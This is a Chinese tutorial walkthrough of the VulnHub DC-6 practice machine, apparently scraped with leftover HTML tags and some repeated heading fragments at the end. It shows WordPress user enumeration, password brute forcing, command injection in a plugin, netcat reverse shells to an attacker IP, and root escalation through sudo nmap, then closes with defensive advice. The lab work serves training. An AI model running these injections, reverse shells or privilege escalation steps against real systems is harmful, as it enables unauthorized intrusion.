VulnHub靶机DC-6渗透测试详细教学文档<\/h1>

一、靶机概述<\/h2>
DC-6是VulnHub上提供的一个专为渗透测试练习设计的靶机，基于WordPress CMS构建，包含多种漏洞和提权路径。<\/p>

二、环境准备<\/h2>

靶机下载地址：https:\/\/www.vulnhub.com\/entry\/dc-6,315\/<\/li>
将靶机导入虚拟机软件（如VMware或VirtualBox）<\/li>

确保攻击机（Kali Linux）与靶机在同一网络环境中<\/li> <\/ol>

三、渗透测试流程<\/h2>

1. 主机发现<\/h3>

使用以下命令识别靶机IP地址：<\/p>

arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 192.168.0.0\/24
<\/span><\/span><\/code><\/pre>2. 端口扫描与服务识别<\/h3>
nmap -p- 192.168.0.106
<\/span><\/span>nmap -p80 -sV -A 192.168.0.106
<\/span><\/span><\/code><\/pre>扫描结果应显示开放22(SSH)和80(HTTP)端口。<\/p>
3. Web应用信息收集<\/h3>
whatweb http:\/\/192.168.0.106
<\/span><\/span><\/code><\/pre>发现使用WordPress CMS，需要配置本地hosts解析：<\/p>
echo "192.168.0.106 wordy"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>4. WordPress枚举<\/h3>
使用WPScan枚举用户：<\/p>
wpscan --url http:\/\/wordy -e u
<\/span><\/span><\/code><\/pre>成功枚举出五位用户信息，保存到user.txt文件中。<\/p>
5. 目录爆破<\/h3>
dirsearch -u http:\/\/wordy -i 200<\/span>
<\/span><\/span><\/code><\/pre>发现登录界面\/wp-login.php。<\/p>
6. 密码爆破<\/h3>
根据作者提示，从rockyou.txt中筛选包含"k01"的密码：<\/p>
cat \/usr\/share\/wordlists\/rockyou.txt | grep k01 > passwords.txt
<\/span><\/span>wpscan --url http:\/\/wordy -U user.txt -P passwords.txt
<\/span><\/span><\/code><\/pre>成功爆破出凭据：<\/p>

用户名：mark<\/li>
密码：helpdesk01<\/li>
<\/ul>
7. 获取初始访问<\/h3>

使用获取的凭据登录WordPress后台<\/li>
发现"Activity monitor"插件存在命令注入漏洞<\/li>
测试命令注入：
127.0.0.1 | ls
<\/code><\/pre>
<\/li>
建立反向shell：

Kali监听：
nc -lvvp 8888<\/span>
<\/span><\/span><\/code><\/pre><\/li>
靶机执行（通过修改请求数据包绕过长度限制）：
127.0.0.1 | nc -e \/bin\/bash 192.168.0.107 8888
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
<\/ol>
8. 权限提升路径<\/h3>
8.1 信息收集<\/h4>

获取稳定shell：
python -c "import pty;pty.spawn('\/bin\/bash')"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
检查用户目录：

\/home\/jens\/backups.sh - 网站备份脚本<\/li>
\/home\/mark\/stuff\/things-to-do.txt - 包含graham用户的密码<\/li>
<\/ul>
<\/li>
<\/ol>
8.2 横向移动<\/h4>
使用graham凭据通过SSH登录：<\/p>
ssh graham@192.168.0.106
<\/span><\/span><\/code><\/pre>8.3 提权至jens用户<\/h4>

检查sudo权限：
sudo -l
<\/span><\/span><\/code><\/pre><\/li>
发现可以jens用户身份执行\/home\/jens\/backups.sh<\/li>
修改脚本添加反向shell：
echo "nc -e \/bin\/bash 192.168.0.107 6666"<\/span> >> backups.sh
<\/span><\/span>sudo -u jens \/home\/jens\/backups.sh
<\/span><\/span><\/code><\/pre><\/li>
Kali监听6666端口获取jens shell<\/li>
<\/ol>
8.4 提权至root<\/h4>

再次检查sudo权限：
sudo -l
<\/span><\/span><\/code><\/pre><\/li>
发现jens可以root权限执行nmap<\/li>
创建提权脚本：
echo 'os.execute("\/bin\/sh")'<\/span> > root_shell.sh
<\/span><\/span>sudo nmap --script=<\/span>root_shell.sh
<\/span><\/span><\/code><\/pre><\/li>
成功获取root权限<\/li>
<\/ol>
四、关键知识点总结<\/h2>

主机发现<\/strong>：使用arp-scan或nmap进行网络扫描<\/li>
服务枚举<\/strong>：nmap的-sV和-A参数获取详细服务信息<\/li>
WordPress枚举<\/strong>：WPScan工具的用户枚举功能<\/li>
密码爆破<\/strong>：合理利用字典和过滤技术提高效率<\/li>
命令注入<\/strong>：识别和利用Web应用中的命令注入漏洞<\/li>
反向shell<\/strong>：多种建立反向shell的方法<\/li>
权限提升路径<\/strong>：

通过信息泄露获取新凭据<\/li>
利用sudo权限执行特定脚本<\/li>
滥用具有SUID权限或特殊sudo权限的应用程序（如nmap）<\/li>
<\/ul>
<\/li>
<\/ol>
五、防御建议<\/h2>


WordPress安全：<\/p>

限制用户枚举功能<\/li>
使用强密码策略<\/li>
及时更新插件和核心<\/li>
<\/ul>
<\/li>

系统安全：<\/p>

限制sudo权限<\/li>
避免使用危险程序的特殊权限<\/li>
定期检查SUID\/SGID文件<\/li>
<\/ul>
<\/li>

开发安全：<\/p>

避免命令注入漏洞<\/li>
对用户输入进行严格过滤<\/li>
最小权限原则<\/li>
<\/ul>
<\/li>
<\/ol>
六、工具清单<\/h2>

arp-scan - 主机发现<\/li>
nmap - 端口扫描和服务识别<\/li>
whatweb - Web应用指纹识别<\/li>
wpscan - WordPress漏洞扫描<\/li>
dirsearch - 目录爆破<\/li>
netcat - 建立反向shell<\/li>
sudo\/nmap - 提权工具<\/li>
<\/ol>
通过本实验，可以全面掌握从信息收集到权限提升的完整渗透测试流程，特别是WordPress系统的安全评估和Linux系统的提权技术。<\/p>

VulnHub靶机DC-6渗透测试详细教学文档<\/h1>

一、靶机概述<\/h2> DC-6是VulnHub上提供的一个专为渗透测试练习设计的靶机，基于WordPress CMS构建，包含多种漏洞和提权路径。<\/p>

三、渗透测试流程<\/h2>

8. 权限提升路径<\/h3>

一、靶机概述<\/h2>
DC-6是VulnHub上提供的一个专为渗透测试练习设计的靶机，基于WordPress CMS构建，包含多种漏洞和提权路径。<\/p>